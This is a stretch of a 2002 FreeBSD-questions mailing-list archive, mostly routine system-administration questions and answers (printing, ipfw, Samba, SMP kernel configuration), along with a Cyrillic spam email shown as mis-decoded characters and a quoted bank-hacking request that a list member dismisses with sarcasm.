ÓÑËÓÃÈ Reply-To: evsnew@email.ru X-Mailer: The Bat! (v1.52f) Business X-Priority: 3 X-MSMail-Priority: Normal Mime-Version: 1.0 Content-Type: text/plain; charset="Windows-1251" Date: Tue, 25 Jun 2002 00:25:45 +0400 Message-Id: <20020624202430Z3303860-14399+9817@gnome02.net.rol.ru> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Êîìïàíèÿ "Ýêñïðåññ Âèçà Ñåðâèñ" ïðåäëàãàåò: ÏÐÈÃËÀØÅÍÈß ÄËß ÈÍÎÑÒÐÀÍÍÛÕ ÃÐÀÆÄÀÍ Â ÐÎÑÑÈÞ Îôîðìëåíèå ïðèãëàøåíèé: Îäíîêðàòíîå íà 1 ìåñÿö - $ 25 Ìíîãîêðàòíîå íà 1 ãîä - $ 150 *Ïðàâîâûå âîïðîñû îòíîñèòåëüíî ïðåáûâàíèÿ èíîñòðàííûõ ãðàæäàí íà òåððèòîðèè ÐÔ. ÎÔÎÐÌËÅÍÈÅ ÂÛÅÇÄÍÛÕ ÂÈÇ ÐÎÑÑÈßÍÀÌ - Ãåðìàíèÿ - Ôðàíöèÿ - Àíãëèÿ - Øâåéöàðèÿ - Èòàëèÿ è ìíîæåñòâî äðóãèõ ñòðàí... Ïðåäñòàâëåíèå Âàøèõ èíòåðåñîâ â êîíñóëüñòâàõ Ìîñêâû. ÎÔÎÐÌËÅÍÈÅ ÇÀÃÐÀÍÏÀÑÏÎÐÒΠ(Öåíû óêàçàíû äëÿ æèòåëåé Ìîñêâû è Ìîñê. îáëàñòè) 35 ðàá.äíåé - $70 21-23 ðàá.äíåé - $140 15-17 ðàá.äíåé - $180 10-12 ðàá.äíåé - $260 Ïî Âàøåìó çàïðîñó âûøëåì êîìïëåêò íåîáõîäèìûõ äîêóìåíòîâ äëÿ îôîðìëåíèÿ çàãðàíïàñïîðòà. ÁÅÑÏËÀÒÍÛÉ ÂÛÅÇÄ ÊÓÐÜÅÐÀ Ê ÂÀÌ Â ÎÔÈÑ Â ÏÐÅÄÅËÀÕ ã. ÌÎÑÊÂÛ Òåë./ôàêñ: (095) 107-78-58,797-04-08, 797-04-82 ------------------------ Ïðèíîñèì ñâîè èçâèíåíèÿ åñëè ýòî ïèñüìî íå îêàçàëîñü äëÿ Âàñ ïîëåçíûì. ×òîáû îòêàçàòüñÿ îò ðàññûëêè íàïèøèòå ïèñüìî íà àäðåñ: delete@email.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 14:21:26 2002 Delivered-To: freebsd-questions@freebsd.org Received: from PHSEXCHICI2.Partners.org (phsexchici2.partners.org [170.223.254.21]) by hub.freebsd.org (Postfix) with ESMTP id C13D637B400 for ; Mon, 24 Jun 2002 14:21:20 -0700 (PDT) Received: by phsexchici2.partners.org with Internet Mail Service (5.5.2650.21) id ; Mon, 24 Jun 2002 17:21:20 -0400 Message-ID: <375F68784081D511908A00508BE3BB1701EF1BF1@phsexch22.mgh.harvard.edu> From: "Morse, Richard E." To: "'noackjr@compgeek.com'" , questions@FreeBSD.org Subject: RE: hacking a bank account (was Pedido) Date: Mon, 24 Jun 2002 17:21:13 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="ISO-8859-1" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Jon Noack [mailto:noackjr@compgeek.com] wrote: > > Necesito que me des las claves para hackear una cuenta bancaria en > internet" > Rough translation: > "I need you to give me the tools to hack a bank account on > the Internet" > > Um, I don't understand the whole email, but at the very least > I think you're > emailing the wrong list. If the above is really what you > seek then you are > definitely asking a question outside the bounds of this list. According to the fish: > Hello, that what I am going to ask to you it seems a madness, > but it does not matter equal I am going it to do. I need that > me DES the keys to hackear a banking account in Internet, osea > to rob the pin to him to banking accounts that work from home > Banking of their respective banks. The reasons are dificiles > to explain, I that if I say to you that it is for taking > revenge itself of puto that me cago you are not going to > believe to me, but is asi. I request to you please that if this > to your reach to give this hand me, you I am going it to be > thankful and I am going it to do very well. That this can be > very dangerous for my, but I am going to run the risk. I request > to you that you send to a mail anonimo to me with the information, > if that leaves you but calm, from already thank you very much. Sounds like fun! I'm sure that if such tools can be provided, the banking community _really_ wants to know about them... Ricky To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 14:31:50 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mailsrv.otenet.gr (mailsrv.otenet.gr [195.170.0.5]) by hub.freebsd.org (Postfix) with ESMTP id 8C5B437B400 for ; Mon, 24 Jun 2002 14:31:45 -0700 (PDT) Received: from hades.hell.gr (patr530-a110.otenet.gr [212.205.215.110]) by mailsrv.otenet.gr (8.12.3/8.12.3) with ESMTP id g5OLVf15010679; Tue, 25 Jun 2002 00:31:42 +0300 (EEST) Received: from hades.hell.gr (hades [127.0.0.1]) by hades.hell.gr (8.12.4/8.12.4) with ESMTP id g5OLVfIO002450; Tue, 25 Jun 2002 00:31:41 +0300 (EEST) (envelope-from keramida@ceid.upatras.gr) Received: (from charon@localhost) by hades.hell.gr (8.12.4/8.12.4/Submit) id g5OLVeP4002449; Tue, 25 Jun 2002 00:31:40 +0300 (EEST) (envelope-from keramida@ceid.upatras.gr) Date: Tue, 25 Jun 2002 00:31:40 +0300 From: Giorgos Keramidas To: David Banning Cc: Matthew Seaman , questions@FreeBSD.ORG Subject: Re: can't telnet anything on port 25 Message-ID: <20020624213140.GA2358@hades.hell.gr> References: <20020624140920.A22529@skytrackercanada.com> <20020624185034.GA10465@happy-idiot-talk.infracaninophi> <20020624151005.B22849@skytrackercanada.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020624151005.B22849@skytrackercanada.com> X-Operating-System: FreeBSD 5.0-CURRENT #0: Sun Jun 23 22:51:33 EEST 2002 X-PGP-Fingerprint: C1EB 0653 DB8B A557 3829 00F9 D60F 941A 3186 03B6 X-Phone: +30-944-116520 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 2002-06-24 15:10 +0000, David Banning wrote: > I believe now that the host ISP is blocking our box making any inquiries > on port 25 to any server but thiers. That could be the case. Did you contact your ISP and ask, to make sure? Giorgos Keramidas FreeBSD: The Power to Serve keramida@FreeBSD.org http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 14:44: 1 2002 Delivered-To: freebsd-questions@freebsd.org Received: from PHSEXCHICO2.Partners.org (phsexchico2.partners.org [170.223.254.20]) by hub.freebsd.org (Postfix) with ESMTP id 4858137B400 for ; Mon, 24 Jun 2002 14:43:57 -0700 (PDT) Received: by phsexchico2.partners.org with Internet Mail Service (5.5.2650.21) id <2ZZZ6QYL>; Mon, 24 Jun 2002 17:43:56 -0400 Message-ID: <375F68784081D511908A00508BE3BB1701EF1BF3@phsexch22.mgh.harvard.edu> From: "Morse, Richard E." To: 'sig' , freebsd-questions@FreeBSD.ORG Subject: RE: minfo output: junk in mbufs. can someone comment this? Date: Mon, 24 Jun 2002 17:43:53 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sig [mailto:sig@uct.kiev.ua] wrote: > Our server now running with > FreeBSD seth.uct.kiev.ua 4.5-RELEASE-p6 FreeBSD 4.5-RELEASE-p6 #0: > > server acts as gateway for ~200 hosts/ips. > The system halts every 2-3 days, without any error reports! > > We have following active ethernet interfaces on board: > > xl0-3: flags=8843 mtu 1500 > options=3 > media: Ethernet autoselect (100baseTX ) > status: active Is is an actual crash, or is it that the system disappears from the network? Ricky To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 14:46:16 2002 Delivered-To: freebsd-questions@freebsd.org Received: from transbay.net (mail.transbay.net [209.133.53.217]) by hub.freebsd.org (Postfix) with ESMTP id AB9CE37B400 for ; Mon, 24 Jun 2002 14:46:09 -0700 (PDT) Received: from borges (stalwart.codysbooks.com [209.133.54.175]) by transbay.net (8.11.2/8.11.2) with ESMTP id g5OLk9L92032 for ; Mon, 24 Jun 2002 14:46:09 -0700 (PDT) Subject: SWAT/SAMBA problems From: Scott Reese Reply-To: sreese@codysbooks.com To: freebsd-questions@FreeBSD.org Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 24 Jun 2002 14:46:07 -0700 Message-Id: <1024955167.276.8.camel@borges.codysbooks.com> Mime-Version: 1.0 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG [note: I'm not currently subbed to this list so please 'Cc:' me directly in any replies. Thank you.] After successfully building and installing Samba 3.0 alpha-17 on my 4.6-RELEASE box, I have found that Swat does not work for some strange reason. I uncommented the swat line in /etc/inetd.conf, checked to make sure the service was listed in /etc/services (which it was) and then I HUP'd inetd and I still cannot connect to Swat. I've tried using 'http://localhost:901' as well as 'http://my.ip.address:901' and neither worked. This condition persisted after a reboot as well. As far as I can tell, Samba itself is working just fine. I can access the shares from other computers which is as it should be. Has anyone else seen this or have any ideas on why this might be happening? I have searched the mailing list archives and Google, but I found nothing useful. TIA, Scott To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 15:21:15 2002 Delivered-To: freebsd-questions@freebsd.org Received: from may.priocom.com (may.priocom.com [213.156.65.50]) by hub.freebsd.org (Postfix) with ESMTP id 6B60837B40F for ; Mon, 24 Jun 2002 15:20:30 -0700 (PDT) Received: (qmail 11344 invoked from network); 24 Jun 2002 22:17:43 -0000 Received: from unknown (HELO tower) ([193.193.195.64]) (envelope-sender ) by 0 (qmail-ldap-1.03) with SMTP for ; 24 Jun 2002 22:17:43 -0000 Date: Tue, 25 Jun 2002 01:20:24 +0300 From: Andrew X-Mailer: The Bat! (v1.60q) Reply-To: Andrew X-Priority: 3 (Normal) Message-ID: <172152849.20020625012024@ukrpost.net> To: freebsd-questions@FreeBSD.ORG Subject: UFS from Windows MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello. Is there a tool to access FreeBSD partition from WindowsXP (like ExploreFS for ext2fs)? -- Yours sincerely, Andrew mailto:perl@ukrpost.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 15:28:36 2002 Delivered-To: freebsd-questions@freebsd.org Received: from sccrmhc01.attbi.com (sccrmhc01.attbi.com [204.127.202.61]) by hub.freebsd.org (Postfix) with ESMTP id A46DA37B53A for ; Mon, 24 Jun 2002 15:27:23 -0700 (PDT) Received: from Cerberus ([12.237.97.47]) by sccrmhc01.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP id <20020624222723.NLJ19962.sccrmhc01.attbi.com@Cerberus> for ; Mon, 24 Jun 2002 22:27:23 +0000 From: "Robert L. Bostic" To: "Freebsd-Questions" Subject: Monitor & video configuration on a laptop Date: Mon, 24 Jun 2002 17:27:18 -0500 Message-ID: MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_000B_01C21BA4.64388F50" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1060 Importance: Normal Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_000B_01C21BA4.64388F50 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit I successfully installed FreeBSD 4.6 on a Sony PCG-FXA47 laptop. However, I was unable to find a monitor and video card setting that will allow me to startx. Startx fails complaining of being unable to find a usable configuration. After several days of trial and error, I was compelled to give up and conclude that 4.6 has no monitor/video card settings compatible with my laptop. Does anyone know of a work around that I use? Thanks. Robert neozulu@attbi.com ------=_NextPart_000_000B_01C21BA4.64388F50 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
I = successfully=20 installed FreeBSD 4.6 on a Sony PCG-FXA47 laptop. However,  I was = unable to=20 find a monitor and video card setting that will allow me to startx. = Startx fails=20 complaining of being unable to find a usable configuration. After = several days=20 of trial and error, I was compelled to give up and conclude that 4.6 has = no=20 monitor/video card settings compatible with my laptop. Does anyone know = of a=20 work around that I use? Thanks.
 
Robert
neozulu@attbi.com
 
------=_NextPart_000_000B_01C21BA4.64388F50-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 15:28:39 2002 Delivered-To: freebsd-questions@freebsd.org Received: from hotmail.com (oe50.law11.hotmail.com [64.4.16.22]) by hub.freebsd.org (Postfix) with ESMTP id 539EF37B62E for ; Mon, 24 Jun 2002 15:27:44 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 24 Jun 2002 15:27:44 -0700 X-Originating-IP: [24.71.22.183] From: "Victor Wang" To: Subject: The FreeBSD boot manager? Date: Mon, 24 Jun 2002 15:23:37 -0700 MIME-Version: 1.0 X-Mailer: MSN Explorer 7.00.0021.1900 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0000_01C21B93.1CCF8620" Message-ID: X-OriginalArrivalTime: 24 Jun 2002 22:27:44.0140 (UTC) FILETIME=[5C0D8CC0:01C21BCE] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ------=_NextPart_001_0000_01C21B93.1CCF8620 Content-Type: text/plain; charset="big5" Content-Transfer-Encoding: quoted-printable I am hesitant to change my MBR for obvious reasons. Is it possible to u= ninstall the FreeBSD boot manager from the MBR? And would installing a ne= w MBR or boot manager on a laptop screw it up? Thanks in advance.Get mor= e from the Web. FREE MSN Explorer download : http://explorer.msn.com ------=_NextPart_001_0000_01C21B93.1CCF8620 Content-Type: text/html; charset="big5" Content-Transfer-Encoding: quoted-printable

 &nbs= p;I am hesitant to change my MBR for obvious reasons. Is it possible to u= ninstall the FreeBSD boot manager from the MBR? And would installing a ne= w MBR or boot manager on a laptop screw it up?  Thanks in advan= ce.


Get more from the Web. FR= EE MSN Explorer download : http://exp= lorer.msn.com

------=_NextPart_001_0000_01C21B93.1CCF8620-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 15:50:12 2002 Delivered-To: freebsd-questions@freebsd.org Received: from wonkity.com (wonkity.com [63.93.4.4]) by hub.freebsd.org (Postfix) with ESMTP id 16E6337B482 for ; Mon, 24 Jun 2002 15:49:48 -0700 (PDT) Received: from wonkity.com (localhost.wonkity.com [127.0.0.1]) by wonkity.com (8.12.1/8.11.6) with ESMTP id g5OMnluF097713; Mon, 24 Jun 2002 16:49:47 -0600 (MDT) (envelope-from wblock@wonkity.com) Received: from localhost (wblock@localhost) by wonkity.com (8.12.1/8.12.1/Submit) with ESMTP id g5OMnkKI097710; Mon, 24 Jun 2002 16:49:46 -0600 (MDT)?g (envelope-from wblock@wonkity.com) Date: Mon, 24 Jun 2002 16:49:46 -0600 (MDT) From: Warren Block To: Ronan Lucio Cc: freebsd-questions@FreeBSD.ORG Subject: Re: LPD Error In-Reply-To: <20020624163330.4db03459.ronanl@melim.com.br> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Mon, 24 Jun 2002, Ronan Lucio wrote: > Hello Warren, > > > > But, if it's wrong, how should I set the users permissions? > > > > chown -R daemon.daemon /var/spool/output/lpd/spo > > I've did it but the lpd still don't work... :-/ Whoops--my brain finally got back to me on this. lpd runs filters as user daemon, so I'm used to setting ownership of these directories that way. Let me try again. Just to make sure things are clear: The FreeBSD system is receiving print jobs. It's then sending them on to the queue called "lp" on "spo", another machine or print server. Right? (You've got filtered queues also, but let's do this one first.) I've compared your printcap to mine, and there are some differences. Here's a printcap entry I use to talk to my HP4M laser on the network. lpraw:\ :lp=:\ :sh:\ :mx#0:\ :rm=hp4m:\ :rp="raw":\ :sd=/var/spool/output/lpd/lpraw:\ :lf=/var/log/lpd-errs: I'm not sure which of these are optional, but it won't hurt to have the extras. So your printcap entry for this machine should be: spo:\ :lp=:\ :sh=:\ :mx#0:\ :rm=spo:\ :rp="lp":\ :sd=/var/spool/lpd/spo:\ :lf=/var/log/lpd-errs: The difference is that lp= is defined (as undefined!), and a log file is defined. Owner of the /var/spool/lpd/spo directory is root.daemon, and permissions of the files in it (lock and status) are 664: chmod 664 /var/spool/lpd/spo Now... with those settings, does your system process print jobs for spo? -Warren Block * Rapid City, South Dakota USA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 15:52:17 2002 Delivered-To: freebsd-questions@freebsd.org Received: from spork.pantherdragon.org (spork.pantherdragon.org [206.29.168.146]) by hub.freebsd.org (Postfix) with ESMTP id CA66537B499 for ; Mon, 24 Jun 2002 15:50:40 -0700 (PDT) Received: from spark.techno.pagans (spark.techno.pagans [4.61.202.145]) by spork.pantherdragon.org (Postfix) with ESMTP id 3D3C4471DC for ; Mon, 24 Jun 2002 15:50:40 -0700 (PDT) Received: from pantherdragon.org (speck.techno.pagans [172.21.42.2]) by spark.techno.pagans (Postfix) with ESMTP id A5462FEBE for ; Mon, 24 Jun 2002 15:50:37 -0700 (PDT) Message-ID: <3D17A23D.8DB3DEF4@pantherdragon.org> Date: Mon, 24 Jun 2002 15:50:37 -0700 From: Darren Pilgrim X-Mailer: Mozilla 4.76 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-questions@freebsd.org Subject: Speed of me vs. specific address mask in ipfw? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Which is faster to match in ipfw, the "me" keyword or a specific address mask? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 15:59:18 2002 Delivered-To: freebsd-questions@freebsd.org Received: from priv-edtnes16-hme0.telusplanet.net (defout.telus.net [199.185.220.240]) by hub.freebsd.org (Postfix) with ESMTP id D9BE337B401 for ; Mon, 24 Jun 2002 15:59:15 -0700 (PDT) Received: from gcooper ([205.206.153.209]) by priv-edtnes16-hme0.telusplanet.net (InterMail vM.5.01.04.02 201-253-122-122-102-20011128) with SMTP id <20020624225915.VRXA7316.priv-edtnes16-hme0.telusplanet.net@gcooper> for ; Mon, 24 Jun 2002 16:59:15 -0600 Message-ID: <000701c21bda$32c53280$d199cecd@ab.hsia.telus.net> From: "Grant Cooper" To: References: <20020624140920.A22529@skytrackercanada.com> <20020624185034.GA10465@happy-idiot-talk.infracaninophi> <20020624151005.B22849@skytrackercanada.com> <20020624213140.GA2358@hades.hell.gr> Subject: Getting wrong MAC address Date: Mon, 24 Jun 2002 17:52:28 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I am getting a completely wrong MAC address on one of my cards, but I am still able to connect to the internet through my DSL? Is there anyway to solve this? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 16: 2:46 2002 Delivered-To: freebsd-questions@freebsd.org Received: from maile.telia.com (maile.telia.com [194.22.190.16]) by hub.freebsd.org (Postfix) with ESMTP id 866DB37B400 for ; Mon, 24 Jun 2002 16:02:41 -0700 (PDT) Received: from d1o913.telia.com (d1o913.telia.com [195.252.44.241]) by maile.telia.com (8.11.6/8.11.6) with ESMTP id g5ON2dp07007 for ; Tue, 25 Jun 2002 01:02:40 +0200 (CEST) Received: from falcon.midgard.homeip.net (h53n2fls20o913.telia.com [212.181.163.53]) by d1o913.telia.com (8.8.8/8.8.8) with SMTP id BAA13412 for ; Tue, 25 Jun 2002 01:02:38 +0200 (CEST) Received: (qmail 6441 invoked by uid 1001); 24 Jun 2002 23:02:37 -0000 Date: Tue, 25 Jun 2002 01:02:37 +0200 From: Erik Trulsson To: Darren Pilgrim Cc: freebsd-questions@freebsd.org Subject: Re: Speed of me vs. specific address mask in ipfw? Message-ID: <20020624230237.GA6401@falcon.midgard.homeip.net> Mail-Followup-To: Darren Pilgrim , freebsd-questions@freebsd.org References: <3D17A23D.8DB3DEF4@pantherdragon.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3D17A23D.8DB3DEF4@pantherdragon.org> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Mon, Jun 24, 2002 at 03:50:37PM -0700, Darren Pilgrim wrote: > Which is faster to match in ipfw, the "me" keyword or a specific address > mask? A specific address mask should be faster. Using the "me" keyword means that ipfw has to check what interfaces you have and what adresses they have every time the rule is used. (This also means that when using the "me" keyword one doesn't have to worry about the IP numbers changing on dynamic interfaces. -- Erik Trulsson ertr1013@student.uu.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 17:23:47 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web14808.mail.yahoo.com (web14808.mail.yahoo.com [216.136.224.224]) by hub.freebsd.org (Postfix) with SMTP id B608D37B401 for ; Mon, 24 Jun 2002 17:23:23 -0700 (PDT) Message-ID: <20020625002323.5786.qmail@web14808.mail.yahoo.com> Received: from [165.247.89.252] by web14808.mail.yahoo.com via HTTP; Mon, 24 Jun 2002 17:23:23 PDT Date: Mon, 24 Jun 2002 17:23:23 -0700 (PDT) From: mingo lu Subject: Re: SMP problems To: Philip Paeps Cc: freebsd-questions In-Reply-To: <20020624093117.GG48808@juno.paeps.cx> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="0-2139314008-1024964603=:5180" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --0-2139314008-1024964603=:5180 Content-Type: multipart/alternative; boundary="0-1820217776-1024964603=:5180" --0-1820217776-1024964603=:5180 Content-Type: text/plain; charset=us-ascii Thanks. The freebsd version is 4.5 and machine is proliant 800 (dual-cpu, 200 Mhz). I really think that there are bugs for 4.5 version ... _mingo Philip Paeps wrote: On 2002-06-24 05:17:03, mingo lu wrote: > I am trying to build SMP kernel with my dual-cpu machine (compaq proliant) > and failed. Which Proliant have you got? What all is in the machine? Compaq has about a hundred different Proliants. > atcually it was compiled with no error. After reboot, it hanged > up at : > > ..... > > Change APIC ID for IO APIC #0 from 0 to 2 on chip > > Programming 24 pins in IOAPIC #0 > > IOAPIC #O intpin 2 -> irq 0 > > The booting process never went beyond this,ust hanged at this point. Weird. > I checked kernel file and found there were no lines (options NCPU, NBUS, > NAPIC and NINTR). I added those lines and tried to recomplied it; the > compilation was failed: Can you post your kernel config file? Be sure to remove the 386_CPU and 486_CPU lines when compiling SMP kernels, they 'confuse' things. [...] - Philip -- Philip Paeps philip@paeps.cx http://www.paeps.cx/ +32 486 114 720 --------------------------------- Do You Yahoo!? Sign-up for Video Highlights of 2002 FIFA World Cup --0-1820217776-1024964603=:5180 Content-Type: text/html; charset=us-ascii

Thanks.

The freebsd version is 4.5 and machine is proliant 800 (dual-cpu, 200 Mhz). I really think that there are bugs for 4.5 version ...

 

_mingo

  Philip Paeps <philip@paeps.cx> wrote:

On 2002-06-24 05:17:03, mingo lu wrote:
> I am trying to build SMP kernel with my dual-cpu machine (compaq proliant)
> and failed.

Which Proliant have you got? What all is in the machine? Compaq has about a
hundred different Proliants.

> atcually it was compiled with no error. After reboot, it hanged
> up at :
>
> .....
>
> Change APIC ID for IO APIC #0 from 0 to 2 on chip
>
> Programming 24 pins in IOAPIC #0
>
> IOAPIC #O intpin 2 -> irq 0
>
> The booting process never went beyond this,ust hanged at this point.

Weird.

> I checked kernel file and found there were no lines (options NCPU, NBUS,
> NAPIC and NINTR). I added those lines and tried to recomplied it; the
> compilation was failed:

Can you post your kernel config file? Be sure to remove the 386_CPU and
486_CPU lines when compiling SMP kernels, they 'confuse' things.

[...]

- Philip

--
Philip Paeps
philip@paeps.cx
http://www.paeps.cx/

+32 486 114 720



Do You Yahoo!?
Sign-up for Video Highlights of 2002 FIFA World Cup --0-1820217776-1024964603=:5180-- --0-2139314008-1024964603=:5180 Content-Type: text/plain; name=smp Content-Description: smp Content-Disposition: inline; filename=smp # # GENERIC -- Generic kernel configuration file for FreeBSD/i386 # # For more information on this file, please read the handbook section on # Kernel Configuration Files: # # http://www.FreeBSD.org/handbook/kernelconfig-config.html # # The handbook is also available locally in /usr/share/doc/handbook # if you've installed the doc distribution, otherwise always see the # FreeBSD World Wide Web server (http://www.FreeBSD.org/) for the # latest information. # # An exhaustive list of options and more detailed explanations of the # device lines is also present in the ./LINT configuration file. If you are # in doubt as to the purpose or necessity of a line, check first in LINT. # # $FreeBSD: src/sys/i386/conf/GENERIC,v 1.246.2.38 2002/01/25 17:41:40 murray Exp $ machine i386 # cpu I386_CPU # cpu I486_CPU # cpu I586_CPU cpu I686_CPU # ident GENERIC ident koala maxusers 64 #makeoptions DEBUG=-g #Build kernel with gdb(1) debug symbols # options MATH_EMULATE #Support for x87 emulation options INET #InterNETworking # options INET6 #IPv6 communications protocols options FFS #Berkeley Fast Filesystem options FFS_ROOT #FFS usable as root device [keep this!] options SOFTUPDATES #Enable FFS soft updates support options UFS_DIRHASH #Improve performance on big directories options MFS #Memory Filesystem options MD_ROOT #MD is a potential root device options NFS #Network Filesystem options NFS_ROOT #NFS usable as root device, NFS required # options MSDOSFS #MSDOS Filesystem options CD9660 #ISO 9660 Filesystem options CD9660_ROOT #CD-ROM usable as root, CD9660 required options PROCFS #Process filesystem options COMPAT_43 #Compatible with BSD 4.3 [KEEP THIS!] options SCSI_DELAY=15000 #Delay (in ms) before probing SCSI options UCONSOLE #Allow users to grab the console options USERCONFIG #boot -c editor options VISUAL_USERCONFIG #visual boot -c editor options KTRACE #ktrace(1) support options SYSVSHM #SYSV-style shared memory options SYSVMSG #SYSV-style message queues options SYSVSEM #SYSV-style semaphores options P1003_1B #Posix P1003_1B real-time extensions options _KPOSIX_PRIORITY_SCHEDULING options ICMP_BANDLIM #Rate limit bad replies options KBD_INSTALL_CDEV # install a CDEV entry in /dev # To make an SMP kernel, the next two are needed #options SMP # Symmetric MultiProcessor Kernel #options APIC_IO # Symmetric (APIC) I/O device isa device eisa device pci # Floppy drives device fdc0 at isa? port IO_FD1 irq 6 drq 2 device fd0 at fdc0 drive 0 # device fd1 at fdc0 drive 1 # # If you have a Toshiba Libretto with its Y-E Data PCMCIA floppy, # don't use the above line for fdc0 but the following one: #device fdc0 # ATA and ATAPI devices device ata0 at isa? port IO_WD1 irq 14 device ata1 at isa? port IO_WD2 irq 15 device ata device atadisk # ATA disk drives device atapicd # ATAPI CDROM drives device atapifd # ATAPI floppy drives device atapist # ATAPI tape drives options ATA_STATIC_ID #Static device numbering # SCSI Controllers device ahb # EISA AHA1742 family device ahc # AHA2940 and onboard AIC7xxx devices device amd # AMD 53C974 (Tekram DC-390(T)) device isp # Qlogic family device ncr # NCR/Symbios Logic device sym # NCR/Symbios Logic (newer chipsets) options SYM_SETUP_LP_PROBE_MAP=0x40 # Allow ncr to attach legacy NCR devices when # both sym and ncr are configured device adv0 at isa? device adw device bt0 at isa? device aha0 at isa? device aic0 at isa? 